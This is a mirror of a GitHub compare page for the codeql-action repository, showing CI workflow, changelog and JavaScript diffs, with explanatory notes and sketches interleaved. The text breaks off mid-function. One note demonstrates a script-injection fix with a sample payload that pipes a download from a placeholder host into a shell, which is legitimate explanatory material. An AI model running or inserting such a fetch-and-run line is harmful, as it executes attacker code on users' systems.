Mirror of https://github.com/github/codeql-action.git (synced 2025-12-11 10:14:33 +08:00)

Compare commits: TEST...mbg/start-
261 Commits
Commit list: b24bd4a46f ... 7b4c9fef7d (author and date columns empty)
@@ -61,11 +61,12 @@ runs:
     - name: Check config
       working-directory: ${{ github.action_path }}
       shell: bash
-      run: ts-node ./index.ts "${{ runner.temp }}/user-config.yaml" '${{ inputs.expected-config-file-contents }}'
+      env:
+        EXPECTED_CONFIG_FILE_CONTENTS: '${{ inputs.expected-config-file-contents }}'
+      run: ts-node ./index.ts "$RUNNER_TEMP/user-config.yaml" "$EXPECTED_CONFIG_FILE_CONTENTS"
     - name: Clean up
       shell: bash
       if: always()
       run: |
-        rm -rf ${{ runner.temp }}/codescanning-config-cli-test
-        rm -rf ${{ runner.temp }}/user-config.yaml
+        rm -rf $RUNNER_TEMP/codescanning-config-cli-test
+        rm -rf $RUNNER_TEMP/user-config.yaml
@@ -8,7 +8,7 @@ const actualConfig = loadActualConfig()

 const rawExpectedConfig = process.argv[3].trim()
 if (!rawExpectedConfig) {
-  core.info('No expected configuration provided')
+  core.setFailed('No expected configuration provided')
 } else {
   core.startGroup('Expected generated user config')
   core.info(yaml.dump(JSON.parse(rawExpectedConfig)))
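The change in this hunk is behavioral, not cosmetic: core.info only writes a log line, so a missing expected config previously let the check pass silently, while core.setFailed also marks the step as failed. A minimal standalone sketch of the distinction using the @actions/core API (the script below is illustrative, not the repository's check-config code):

import * as core from "@actions/core";

// core.info writes to the step log and the step still succeeds.
// core.setFailed logs an error annotation and sets process.exitCode = 1,
// which makes the Actions step (and by default the job) fail.
const expected = (process.argv[3] ?? "").trim();
if (!expected) {
  core.setFailed("No expected configuration provided");
} else {
  core.info(`Checking against expected config of length ${expected.length}`);
}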
21 .github/actions/prepare-test/action.yml vendored
@@ -29,24 +29,27 @@ runs:
   - id: get-url
     name: Determine URL
     shell: bash
+    env:
+      VERSION: ${{ inputs.version }}
+      USE_ALL_PLATFORM_BUNDLE: ${{ inputs.use-all-platform-bundle }}
     run: |
       set -e # Fail this Action if `gh release list` fails.

-      if [[ ${{ inputs.version }} == "linked" ]]; then
+      if [[ "$VERSION" == "linked" ]]; then
         echo "tools-url=linked" >> "$GITHUB_OUTPUT"
         exit 0
-      elif [[ ${{ inputs.version }} == "default" ]]; then
+      elif [[ "$VERSION" == "default" ]]; then
         echo "tools-url=" >> "$GITHUB_OUTPUT"
         exit 0
       fi

-      if [[ ${{ inputs.version }} == "nightly-latest" && "$RUNNER_OS" != "Windows" ]]; then
+      if [[ "$VERSION" == "nightly-latest" && "$RUNNER_OS" != "Windows" ]]; then
         extension="tar.zst"
       else
         extension="tar.gz"
       fi

-      if [[ ${{ inputs.use-all-platform-bundle }} == "true" ]]; then
+      if [[ "$USE_ALL_PLATFORM_BUNDLE" == "true" ]]; then
         artifact_name="codeql-bundle.$extension"
       elif [[ "$RUNNER_OS" == "Linux" ]]; then
         artifact_name="codeql-bundle-linux64.$extension"
@@ -59,14 +62,14 @@ runs:
         exit 1
       fi

-      if [[ ${{ inputs.version }} == "nightly-latest" ]]; then
+      if [[ "$VERSION" == "nightly-latest" ]]; then
         tag=`gh release list --repo dsp-testing/codeql-cli-nightlies -L 1 | cut -f 3`
         echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/$tag/$artifact_name" >> $GITHUB_OUTPUT
-      elif [[ ${{ inputs.version }} == *"nightly"* ]]; then
-        version=`echo ${{ inputs.version }} | sed -e 's/^.*\-//'`
+      elif [[ "$VERSION" == *"nightly"* ]]; then
+        version=`echo "$VERSION" | sed -e 's/^.*\-//'`
         echo "tools-url=https://github.com/dsp-testing/codeql-cli-nightlies/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
-      elif [[ ${{ inputs.version }} == *"stable"* ]]; then
-        version=`echo ${{ inputs.version }} | sed -e 's/^.*\-//'`
+      elif [[ "$VERSION" == *"stable"* ]]; then
+        version=`echo "$VERSION" | sed -e 's/^.*\-//'`
         echo "tools-url=https://github.com/github/codeql-action/releases/download/codeql-bundle-$version/$artifact_name" >> $GITHUB_OUTPUT
       else
         echo "::error::Unrecognized version specified!"
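A pattern worth noting, since it repeats across the action.yml changes above and below: inputs are no longer interpolated into run: scripts via ${{ ... }} but are passed through env: and referenced as quoted shell variables. GitHub Actions expands ${{ ... }} expressions textually before bash ever parses the script, so a crafted input value can inject shell commands; an environment variable read as "$VERSION" stays plain data. A small TypeScript simulation of that textual expansion (the malicious value is invented for illustration):

// Simulate the runner's textual substitution of an expression into a script.
const scriptTemplate = 'if [[ ${{ inputs.version }} == "linked" ]]; then';
const maliciousInput = '"; curl https://evil.example | sh; echo "';

// The runner substitutes first; only then does bash parse the result.
const expanded = scriptTemplate.replace("${{ inputs.version }}", maliciousInput);
console.log(expanded);
// => if [[ ""; curl https://evil.example | sh; echo "" == "linked" ]]; then
// The injected commands would execute. With env: VERSION: ${{ inputs.version }}
// and [[ "$VERSION" == "linked" ]], the same value remains inert data.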
7 .github/actions/release-branches/action.yml vendored
@@ -18,8 +18,11 @@ runs:
   using: "composite"
   steps:
     - id: branches
+      env:
+        MAJOR_VERSION: ${{ inputs.major_version }}
+        LATEST_TAG: ${{ inputs.latest_tag }}
       run: |
         python ${{ github.action_path }}/release-branches.py \
-          --major-version ${{ inputs.major_version }} \
-          --latest-tag ${{ inputs.latest_tag }}
+          --major-version "$MAJOR_VERSION" \
+          --latest-tag "$LATEST_TAG"
       shell: bash
2 .github/workflows/__go-tracing-autobuilder.yml generated vendored
@@ -77,7 +77,7 @@ jobs:
       setup-kotlin: 'true'
   - uses: actions/setup-go@v5
     with:
-      go-version: ~1.23.0
+      go-version: ~1.24.0
       # to avoid potentially misleading autobuilder results where we expect it to download
       # dependencies successfully, but they actually come from a warm cache
       cache: false
2 .github/workflows/__go-tracing-custom-build-steps.yml generated vendored
@@ -77,7 +77,7 @@ jobs:
       setup-kotlin: 'true'
   - uses: actions/setup-go@v5
     with:
-      go-version: ~1.23.0
+      go-version: ~1.24.0
       # to avoid potentially misleading autobuilder results where we expect it to download
       # dependencies successfully, but they actually come from a warm cache
       cache: false
2 .github/workflows/__go-tracing-legacy-workflow.yml generated vendored
@@ -77,7 +77,7 @@ jobs:
       setup-kotlin: 'true'
   - uses: actions/setup-go@v5
     with:
-      go-version: ~1.23.0
+      go-version: ~1.24.0
       # to avoid potentially misleading autobuilder results where we expect it to download
       # dependencies successfully, but they actually come from a warm cache
       cache: false
2 .github/workflows/__rubocop-multi-language.yml generated vendored
@@ -46,7 +46,7 @@ jobs:
       use-all-platform-bundle: 'false'
       setup-kotlin: 'true'
   - name: Set up Ruby
-    uses: ruby/setup-ruby@2654679fe7f7c29875c669398a8ec0791b8a64a1 # v1.215.0
+    uses: ruby/setup-ruby@354a1ad156761f5ee2b7b13fa8e09943a5e8d252 # v1.229.0
     with:
       ruby-version: 2.6
   - name: Install Code Scanning integration
71 .github/workflows/__rust.yml generated vendored Normal file
@@ -0,0 +1,71 @@
+# Warning: This file is generated automatically, and should not be modified.
+# Instead, please modify the template in the pr-checks directory and run:
+#     (cd pr-checks; pip install ruamel.yaml@0.17.31 && python3 sync.py)
+# to regenerate this file.
+
+name: PR Check - Rust analysis
+env:
+  GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+  GO111MODULE: auto
+on:
+  push:
+    branches:
+    - main
+    - releases/v*
+  pull_request:
+    types:
+    - opened
+    - synchronize
+    - reopened
+    - ready_for_review
+  schedule:
+  - cron: '0 5 * * *'
+  workflow_dispatch: {}
+jobs:
+  rust:
+    strategy:
+      fail-fast: false
+      matrix:
+        include:
+        - os: ubuntu-latest
+          version: linked
+        - os: ubuntu-latest
+          version: default
+        - os: ubuntu-latest
+          version: nightly-latest
+    name: Rust analysis
+    permissions:
+      contents: read
+      security-events: read
+    timeout-minutes: 45
+    runs-on: ${{ matrix.os }}
+    steps:
+    - name: Check out repository
+      uses: actions/checkout@v4
+    - name: Prepare test
+      id: prepare-test
+      uses: ./.github/actions/prepare-test
+      with:
+        version: ${{ matrix.version }}
+        use-all-platform-bundle: 'false'
+        setup-kotlin: 'true'
+    - uses: ./../action/init
+      with:
+        languages: rust
+        tools: ${{ steps.prepare-test.outputs.tools-url }}
+      env:
+        CODEQL_ACTION_RUST_ANALYSIS: true
+    - uses: ./../action/analyze
+      id: analysis
+      with:
+        upload-database: false
+    - name: Check database
+      shell: bash
+      run: |
+        RUST_DB="${{ fromJson(steps.analysis.outputs.db-locations).rust }}"
+        if [[ ! -d "$RUST_DB" ]]; then
+          echo "Did not create a database for Rust."
+          exit 1
+        fi
+      env:
+        CODEQL_ACTION_TEST_MODE: true
2 .github/workflows/codeql.yml vendored
@@ -75,7 +75,7 @@ jobs:
     strategy:
       fail-fast: false
       matrix:
-        os: [ubuntu-20.04,ubuntu-22.04,windows-2019,windows-2022,macos-13,macos-14]
+        os: [ubuntu-22.04,ubuntu-24.04,windows-2019,windows-2022,macos-13,macos-14]
         tools: ${{ fromJson(needs.check-codeql-versions.outputs.versions) }}
     runs-on: ${{ matrix.os }}
2 .github/workflows/post-release-mergeback.yml vendored
@@ -168,7 +168,7 @@ jobs:
           --draft

   - name: Generate token
-    uses: actions/create-github-app-token@c1a285145b9d317df6ced56c09f525b5c2b6f755
+    uses: actions/create-github-app-token@v2.0.2
     id: app-token
     with:
       app-id: ${{ vars.AUTOMATION_APP_ID }}
2 .github/workflows/update-release-branch.yml vendored
@@ -124,7 +124,7 @@ jobs:
     pull-requests: write # needed to create pull request
   steps:
   - name: Generate token
-    uses: actions/create-github-app-token@c1a285145b9d317df6ced56c09f525b5c2b6f755
+    uses: actions/create-github-app-token@v2.0.2
     id: app-token
     with:
      app-id: ${{ vars.AUTOMATION_APP_ID }}
.pre-commit-config.yaml
@@ -1,20 +1,20 @@
 repos:
   - repo: local
     hooks:
+      - id: lint-ts
+        name: Lint typescript code
+        files: \.ts$
+        language: system
+        entry: npm run lint -- --fix
       - id: compile-ts
         name: Compile typescript
         files: \.[tj]s$
         language: system
         entry: npm run build
         pass_filenames: false
-      - id: lint-ts
-        name: Lint typescript code
-        files: \.ts$
-        language: system
-        entry: npm run lint -- --fix
       - id: pr-checks-sync
         name: Synchronize PR check workflows
         files: ^.github/workflows/__.*\.yml$|^pr-checks
         language: system
-        entry: python3 pr-checks/sync.py
+        entry: pr-checks/sync.sh
         pass_filenames: false
34 CHANGELOG.md
@@ -6,6 +6,40 @@ See the [releases page](https://github.com/github/codeql-action/releases) for th

 No user facing changes.

+## 3.28.16 - 23 Apr 2025
+
+- Update default CodeQL bundle version to 2.21.1. [#2863](https://github.com/github/codeql-action/pull/2863)
+
+## 3.28.15 - 07 Apr 2025
+
+- Fix bug where the action would fail if it tried to produce a debug artifact with more than 65535 files. [#2842](https://github.com/github/codeql-action/pull/2842)
+
+## 3.28.14 - 07 Apr 2025
+
+- Update default CodeQL bundle version to 2.21.0. [#2838](https://github.com/github/codeql-action/pull/2838)
+
+## 3.28.13 - 24 Mar 2025
+
+No user facing changes.
+
+## 3.28.12 - 19 Mar 2025
+
+- Dependency caching should now cache more dependencies for Java `build-mode: none` extractions. This should speed up workflows and avoid inconsistent alerts in some cases.
+- Update default CodeQL bundle version to 2.20.7. [#2810](https://github.com/github/codeql-action/pull/2810)
+
+## 3.28.11 - 07 Mar 2025
+
+- Update default CodeQL bundle version to 2.20.6. [#2793](https://github.com/github/codeql-action/pull/2793)
+
+## 3.28.10 - 21 Feb 2025
+
+- Update default CodeQL bundle version to 2.20.5. [#2772](https://github.com/github/codeql-action/pull/2772)
+- Address an issue where the CodeQL Bundle would occasionally fail to decompress on macOS. [#2768](https://github.com/github/codeql-action/pull/2768)
+
+## 3.28.9 - 07 Feb 2025
+
+- Update default CodeQL bundle version to 2.20.4. [#2753](https://github.com/github/codeql-action/pull/2753)
+
 ## 3.28.8 - 29 Jan 2025

 - Enable support for Kotlin 2.1.10 when running with CodeQL CLI v2.20.3. [#2744](https://github.com/github/codeql-action/pull/2744)
30 justfile Normal file
@@ -0,0 +1,30 @@
+# Perform all working copy cleanup operations
+all: lint sync
+
+# Lint source typescript
+lint:
+    npm run lint-fix
+
+# Sync generated files (javascript and PR checks)
+sync: build update-pr-checks
+
+# Perform all necessary steps to update the PR checks
+update-pr-checks:
+    pr-checks/sync.sh
+
+# Transpile typescript code into javascript
+build:
+    npm run build
+
+# Build then run all the tests
+test: build
+    npm run test
+
+# Run the tests for a single file
+test_file filename: build
+    npx ava --verbose {{filename}}
+
+[doc("Refresh the .js build artefacts in the lib directory")]
+[confirm]
+refresh-lib:
+    rm -rf lib && npm run build
16 lib/analyze-action-post.js generated
@@ -38,12 +38,14 @@ Object.defineProperty(exports, "__esModule", { value: true });
 * It will run after the all steps in this job, in reverse order in relation to
 * other `post:` hooks.
 */
+const fs = __importStar(require("fs"));
 const core = __importStar(require("@actions/core"));
 const actionsUtil = __importStar(require("./actions-util"));
 const api_client_1 = require("./api-client");
 const codeql_1 = require("./codeql");
 const config_utils_1 = require("./config-utils");
 const debugArtifacts = __importStar(require("./debug-artifacts"));
+const dependency_caching_1 = require("./dependency-caching");
 const environment_1 = require("./environment");
 const logging_1 = require("./logging");
 const util_1 = require("./util");
@@ -60,7 +62,19 @@ async function runWrapper() {
         if (config !== undefined) {
             const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
             const version = await codeql.getVersion();
-            await (0, logging_1.withGroup)("Uploading combined SARIF debug artifact", () => debugArtifacts.uploadCombinedSarifArtifacts(logger, config.gitHubVersion.type, version.version));
+            await debugArtifacts.uploadCombinedSarifArtifacts(logger, config.gitHubVersion.type, version.version);
+            }
+        }
+        // If we analysed Java in build-mode: none, we may have downloaded dependencies
+        // to the temp directory. Clean these up so they don't persist unnecessarily
+        // long on self-hosted runners.
+        const javaTempDependencyDir = (0, dependency_caching_1.getJavaTempDependencyDir)();
+        if (fs.existsSync(javaTempDependencyDir)) {
+            try {
+                fs.rmSync(javaTempDependencyDir, { recursive: true });
+            }
+            catch (error) {
+                logger.info(`Failed to remove temporary Java dependencies directory: ${(0, util_1.getErrorMessage)(error)}`);
             }
         }
     }
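The cleanup added above calls getJavaTempDependencyDir() from ./dependency-caching, which this diff does not show. Judging purely from its use sites (a stable temp path that the Java build-mode: none extractor fills and that this post step deletes), a helper of roughly this shape would fit; the directory name below is an assumption for illustration, not the repository's actual implementation:

import * as path from "path";

// Hypothetical sketch: a stable location under the runner's temp directory
// that survives removal of the database scratch directory, so it can be
// cached during the run and cleaned up in the post step.
export function getJavaTempDependencyDir(): string {
  const tempDir = process.env["RUNNER_TEMP"] ?? "/tmp";
  return path.join(tempDir, "codeql_java_dependencies"); // invented leaf name
}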
lib/analyze-action-post.js.map generated
File diff suppressed because one or more lines are too long
20 lib/analyze-action.js generated
@@ -41,7 +41,6 @@ const fs = __importStar(require("fs"));
 const path_1 = __importDefault(require("path"));
 const perf_hooks_1 = require("perf_hooks");
 const core = __importStar(require("@actions/core"));
-const github = __importStar(require("@actions/github"));
 const actionsUtil = __importStar(require("./actions-util"));
 const analyze_1 = require("./analyze");
 const api_client_1 = require("./api-client");
@@ -51,6 +50,7 @@ const codeql_1 = require("./codeql");
 const config_utils_1 = require("./config-utils");
 const database_upload_1 = require("./database-upload");
 const dependency_caching_1 = require("./dependency-caching");
+const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
 const environment_1 = require("./environment");
 const feature_flags_1 = require("./feature-flags");
 const languages_1 = require("./languages");
@@ -189,22 +189,24 @@ async function run() {
     const outputDir = actionsUtil.getRequiredInput("output");
     core.exportVariable(environment_1.EnvVar.SARIF_RESULTS_OUTPUT_DIR, outputDir);
     const threads = util.getThreadsFlag(actionsUtil.getOptionalInput("threads") || process.env["CODEQL_THREADS"], logger);
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
     util.checkActionVersion(actionsUtil.getActionVersion(), gitHubVersion);
     const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, actionsUtil.getTemporaryDirectory(), logger);
     const memory = util.getMemoryFlag(actionsUtil.getOptionalInput("ram") || process.env["CODEQL_RAM"], logger);
-    const pull_request = github.context.payload.pull_request;
-    const diffRangePackDir = pull_request &&
-        (await (0, analyze_1.setupDiffInformedQueryRun)(pull_request.base.ref, pull_request.head.label, codeql, logger, features));
+    const branches = await (0, diff_informed_analysis_utils_1.getDiffInformedAnalysisBranches)(codeql, features, logger);
+    const diffRangePackDir = branches
+        ? await (0, analyze_1.setupDiffInformedQueryRun)(branches, logger)
+        : undefined;
     await (0, analyze_1.warnIfGoInstalledAfterInit)(config, logger);
     await runAutobuildIfLegacyGoWorkflow(config, logger);
     dbCreationTimings = await (0, analyze_1.runFinalize)(outputDir, threads, memory, codeql, config, logger);
+    const cleanupLevel = actionsUtil.getOptionalInput("cleanup-level") || "brutal";
     if (actionsUtil.getRequiredInput("skip-queries") !== "true") {
-        runStats = await (0, analyze_1.runQueries)(outputDir, memory, util.getAddSnippetsFlag(actionsUtil.getRequiredInput("add-snippets")), threads, diffRangePackDir, actionsUtil.getOptionalInput("category"), config, logger, features);
+        runStats = await (0, analyze_1.runQueries)(outputDir, memory, util.getAddSnippetsFlag(actionsUtil.getRequiredInput("add-snippets")), threads, cleanupLevel, diffRangePackDir, actionsUtil.getOptionalInput("category"), config, logger, features);
     }
-    if (actionsUtil.getOptionalInput("cleanup-level") !== "none") {
-        await (0, analyze_1.runCleanup)(config, actionsUtil.getOptionalInput("cleanup-level") || "brutal", logger);
+    if (cleanupLevel !== "none") {
+        await (0, analyze_1.runCleanup)(config, cleanupLevel, logger);
     }
     const dbLocations = {};
     for (const language of config.languages) {
@@ -238,7 +240,7 @@ async function run() {
     }
     else if (uploadResult !== undefined &&
         actionsUtil.getRequiredInput("wait-for-processing") === "true") {
-        await uploadLib.waitForProcessing((0, repository_1.parseRepositoryNwo)(util.getRequiredEnvParam("GITHUB_REPOSITORY")), uploadResult.sarifID, (0, logging_1.getActionsLogger)());
+        await uploadLib.waitForProcessing((0, repository_1.getRepositoryNwo)(), uploadResult.sarifID, (0, logging_1.getActionsLogger)());
     }
     // If we did not throw an error yet here, but we expect one, throw it.
     if (actionsUtil.getOptionalInput("expect-error") === "true") {
File diff suppressed because one or more lines are too long
76 lib/analyze.js generated
@@ -54,11 +54,14 @@ const actionsUtil = __importStar(require("./actions-util"));
 const api_client_1 = require("./api-client");
 const autobuild_1 = require("./autobuild");
 const codeql_1 = require("./codeql");
+const dependency_caching_1 = require("./dependency-caching");
 const diagnostics_1 = require("./diagnostics");
+const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
 const environment_1 = require("./environment");
 const feature_flags_1 = require("./feature-flags");
 const languages_1 = require("./languages");
 const logging_1 = require("./logging");
+const repository_1 = require("./repository");
 const tools_features_1 = require("./tools-features");
 const tracer_config_1 = require("./tracer-config");
 const upload_lib_1 = require("./upload-lib");
@@ -101,6 +104,14 @@ async function runExtraction(codeql, config, logger) {
             config.buildMode === util_1.BuildMode.Autobuild) {
             await (0, autobuild_1.setupCppAutobuild)(codeql, logger);
         }
+        // The Java `build-mode: none` extractor places dependencies (.jar files) in the
+        // database scratch directory by default. For dependency caching purposes, we want
+        // a stable path that caches can be restored into and that we can cache at the
+        // end of the workflow (i.e. that does not get removed when the scratch directory is).
+        if (language === languages_1.Language.java && config.buildMode === util_1.BuildMode.None) {
+            process.env["CODEQL_EXTRACTOR_JAVA_OPTION_BUILDLESS_DEPENDENCY_DIR"] =
+                (0, dependency_caching_1.getJavaTempDependencyDir)();
+        }
         await codeql.extractUsingBuildMode(config, language);
     }
     else {
@@ -151,21 +162,13 @@ async function finalizeDatabaseCreation(codeql, config, threadsFlag, memoryFlag,
 /**
  * Set up the diff-informed analysis feature.
  *
- * @param baseRef The base branch name, used for calculating the diff range.
- * @param headLabel The label that uniquely identifies the head branch across
- * repositories, used for calculating the diff range.
- * @param codeql
- * @param logger
- * @param features
  * @returns Absolute path to the directory containing the extension pack for
  * the diff range information, or `undefined` if the feature is disabled.
  */
-async function setupDiffInformedQueryRun(baseRef, headLabel, codeql, logger, features) {
-    if (!(await features.getValue(feature_flags_1.Feature.DiffInformedQueries, codeql))) {
-        return undefined;
-    }
+async function setupDiffInformedQueryRun(branches, logger) {
     return await (0, logging_1.withGroupAsync)("Generating diff range extension pack", async () => {
-        const diffRanges = await getPullRequestEditedDiffRanges(baseRef, headLabel, logger);
+        logger.info(`Calculating diff ranges for ${branches.base}...${branches.head}`);
+        const diffRanges = await getPullRequestEditedDiffRanges(branches, logger);
         const packDir = writeDiffRangeDataExtensionPack(logger, diffRanges);
         if (packDir === undefined) {
             logger.warning("Cannot create diff range extension pack for diff-informed queries; " +
@@ -180,17 +183,15 @@ async function setupDiffInformedQueryRun(baseRef, headLabel, codeql, logger, fea
 /**
  * Return the file line ranges that were added or modified in the pull request.
  *
- * @param baseRef The base branch name, used for calculating the diff range.
- * @param headLabel The label that uniquely identifies the head branch across
- * repositories, used for calculating the diff range.
+ * @param branches The base and head branches of the pull request.
  * @param logger
  * @returns An array of tuples, where each tuple contains the absolute path of a
  * file, the start line and the end line (both 1-based and inclusive) of an
  * added or modified range in that file. Returns `undefined` if the action was
  * not triggered by a pull request or if there was an error.
  */
-async function getPullRequestEditedDiffRanges(baseRef, headLabel, logger) {
-    const fileDiffs = await getFileDiffsWithBasehead(baseRef, headLabel, logger);
+async function getPullRequestEditedDiffRanges(branches, logger) {
+    const fileDiffs = await getFileDiffsWithBasehead(branches, logger);
     if (fileDiffs === undefined) {
         return undefined;
     }
@@ -213,15 +214,15 @@ async function getPullRequestEditedDiffRanges(baseRef, headLabel, logger) {
     }
     return results;
 }
-async function getFileDiffsWithBasehead(baseRef, headLabel, logger) {
-    const ownerRepo = util.getRequiredEnvParam("GITHUB_REPOSITORY").split("/");
-    const owner = ownerRepo[0];
-    const repo = ownerRepo[1];
-    const basehead = `${baseRef}...${headLabel}`;
+async function getFileDiffsWithBasehead(branches, logger) {
+    // Check CODE_SCANNING_REPOSITORY first. If it is empty or not set, fall back
+    // to GITHUB_REPOSITORY.
+    const repositoryNwo = (0, repository_1.getRepositoryNwoFromEnv)("CODE_SCANNING_REPOSITORY", "GITHUB_REPOSITORY");
+    const basehead = `${branches.base}...${branches.head}`;
     try {
         const response = await (0, api_client_1.getApiClient)().rest.repos.compareCommitsWithBasehead({
-            owner,
-            repo,
+            owner: repositoryNwo.owner,
+            repo: repositoryNwo.repo,
             basehead,
             per_page: 1,
         });
@@ -333,6 +334,14 @@ function writeDiffRangeDataExtensionPack(logger, ranges) {
     if (ranges === undefined) {
         return undefined;
     }
+    if (ranges.length === 0) {
+        // An empty diff range means that there are no added or modified lines in
+        // the pull request. But the `restrictAlertsTo` extensible predicate
+        // interprets an empty data extension differently, as an indication that
+        // all alerts should be included. So we need to specifically set the diff
+        // range to a non-empty list that cannot match any alert location.
+        ranges = [{ path: "", startLine: 0, endLine: 0 }];
+    }
     const diffRangeDir = path.join(actionsUtil.getTemporaryDirectory(), "pr-diff-range");
     fs.mkdirSync(diffRangeDir);
     fs.writeFileSync(path.join(diffRangeDir, "qlpack.yml"), `
@@ -349,6 +358,7 @@ extensions:
   - addsTo:
       pack: codeql/util
       extensible: restrictAlertsTo
+      checkPresence: false
   data:
 `;
     let data = ranges
@@ -368,23 +378,27 @@ extensions:
     const extensionFilePath = path.join(diffRangeDir, "pr-diff-range.yml");
     fs.writeFileSync(extensionFilePath, extensionContents);
     logger.debug(`Wrote pr-diff-range extension pack to ${extensionFilePath}:\n${extensionContents}`);
+    // Write the diff ranges to a JSON file, for action-side alert filtering by the
+    // upload-lib module.
+    (0, diff_informed_analysis_utils_1.writeDiffRangesJsonFile)(logger, ranges);
     return diffRangeDir;
 }
 // Runs queries and creates sarif files in the given folder
-async function runQueries(sarifFolder, memoryFlag, addSnippetsFlag, threadsFlag, diffRangePackDir, automationDetailsId, config, logger, features) {
+async function runQueries(sarifFolder, memoryFlag, addSnippetsFlag, threadsFlag, cleanupLevel, diffRangePackDir, automationDetailsId, config, logger, features) {
     const statusReport = {};
+    const queryFlags = [memoryFlag, threadsFlag];
+    if (cleanupLevel !== "overlay") {
+        queryFlags.push("--expect-discarded-cache");
+    }
     statusReport.analysis_is_diff_informed = diffRangePackDir !== undefined;
-    const dataExtensionFlags = diffRangePackDir
-        ? [
-            `--additional-packs=${diffRangePackDir}`,
-            "--extension-packs=codeql-action/pr-diff-range",
-        ]
-        : [];
+    if (diffRangePackDir) {
+        queryFlags.push(`--additional-packs=${diffRangePackDir}`);
+        queryFlags.push("--extension-packs=codeql-action/pr-diff-range");
+    }
     const sarifRunPropertyFlag = diffRangePackDir
         ? "--sarif-run-property=incrementalMode=diff-informed"
         : undefined;
     const codeql = await (0, codeql_1.getCodeQL)(config.codeQLCmd);
-    const queryFlags = [memoryFlag, threadsFlag, ...dataExtensionFlags];
     for (const language of config.languages) {
         try {
             const sarifFile = path.join(sarifFolder, `${language}.sarif`);
File diff suppressed because one or more lines are too long
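One subtlety in the analyze.js hunks above deserves a closer look: an empty list of diff ranges cannot be written into the data extension as-is, because the restrictAlertsTo extensible predicate reads an empty extension as "no restriction", the opposite of what an empty pull-request diff means. The fix substitutes a single sentinel range that no real alert location can match. A self-contained sketch of that substitution (the DiffRange type here is illustrative, not the repository's declaration):

// Empty extension  => restrictAlertsTo allows every alert location.
// Sentinel range   => a location no alert can have, so nothing matches.
type DiffRange = { path: string; startLine: number; endLine: number };

function withEmptyDiffSentinel(ranges: DiffRange[]): DiffRange[] {
  if (ranges.length === 0) {
    return [{ path: "", startLine: 0, endLine: 0 }];
  }
  return ranges;
}

console.log(withEmptyDiffSentinel([]));
// => [ { path: '', startLine: 0, endLine: 0 } ]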
2 lib/analyze.test.js generated
@@ -114,7 +114,7 @@ const util = __importStar(require("./util"));
     fs.mkdirSync(util.getCodeQLDatabasePath(config, language), {
         recursive: true,
     });
-    const statusReport = await (0, analyze_1.runQueries)(tmpDir, memoryFlag, addSnippetsFlag, threadsFlag, undefined, undefined, config, (0, logging_1.getRunnerLogger)(true), (0, testing_utils_1.createFeatures)([feature_flags_1.Feature.QaTelemetryEnabled]));
+    const statusReport = await (0, analyze_1.runQueries)(tmpDir, memoryFlag, addSnippetsFlag, threadsFlag, "brutal", undefined, undefined, config, (0, logging_1.getRunnerLogger)(true), (0, testing_utils_1.createFeatures)([feature_flags_1.Feature.QaTelemetryEnabled]));
     t.deepEqual(Object.keys(statusReport).sort(), [
         "analysis_is_diff_informed",
         `analyze_builtin_queries_${language}_duration_ms`,
File diff suppressed because one or more lines are too long
21 lib/api-client.js generated
@@ -122,14 +122,12 @@ async function getGitHubVersion() {
 * Get the path of the currently executing workflow relative to the repository root.
 */
 async function getWorkflowRelativePath() {
-    const repo_nwo = (0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY").split("/");
-    const owner = repo_nwo[0];
-    const repo = repo_nwo[1];
+    const repo_nwo = (0, repository_1.getRepositoryNwo)();
     const run_id = Number((0, util_1.getRequiredEnvParam)("GITHUB_RUN_ID"));
     const apiClient = getApiClient();
     const runsResponse = await apiClient.request("GET /repos/:owner/:repo/actions/runs/:run_id?exclude_pull_requests=true", {
-        owner,
-        repo,
+        owner: repo_nwo.owner,
+        repo: repo_nwo.repo,
         run_id,
     });
     const workflowUrl = runsResponse.data.workflow_url;
@@ -187,7 +185,7 @@ function computeAutomationID(analysis_key, environment) {
 }
 /** List all Actions cache entries matching the provided key and ref. */
 async function listActionsCaches(key, ref) {
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     return await getApiClient().paginate("GET /repos/{owner}/{repo}/actions/caches", {
         owner: repositoryNwo.owner,
         repo: repositoryNwo.repo,
@@ -197,7 +195,7 @@ async function listActionsCaches(key, ref) {
 }
 /** Delete an Actions cache item by its ID. */
 async function deleteActionsCache(id) {
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     await getApiClient().rest.actions.deleteActionsCacheById({
         owner: repositoryNwo.owner,
         repo: repositoryNwo.repo,
@@ -206,11 +204,16 @@ async function deleteActionsCache(id) {
 }
 function wrapApiConfigurationError(e) {
     if ((0, util_1.isHTTPError)(e)) {
-        if (e.message.includes("API rate limit exceeded for site ID installation") ||
+        if (e.message.includes("API rate limit exceeded for installation") ||
             e.message.includes("commit not found") ||
-            /^ref .* not found in this repository$/.test(e.message)) {
+            e.message.includes("Resource not accessible by integration") ||
+            /ref .* not found in this repository/.test(e.message)) {
             return new util_1.ConfigurationError(e.message);
         }
+        else if (e.message.includes("Bad credentials") ||
+            e.message.includes("Not Found")) {
+            return new util_1.ConfigurationError("Please check that your token is valid and has the required permissions: contents: read, security-events: write");
+        }
     }
     return e;
 }
File diff suppressed because one or more lines are too long
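Several hunks in this file (and in analyze-action.js above and autobuild.js below) replace the inline parseRepositoryNwo(getRequiredEnvParam("GITHUB_REPOSITORY")) pattern with a single getRepositoryNwo() call. Based on the code being removed, the helper plausibly centralizes the same parsing; the sketch below is a reconstruction under that assumption, not the repository's actual src/repository.ts:

// "nwo" = name with owner, e.g. "github/codeql-action".
interface RepositoryNwo {
  owner: string;
  repo: string;
}

function getRequiredEnvParam(name: string): string {
  const value = process.env[name];
  if (!value) {
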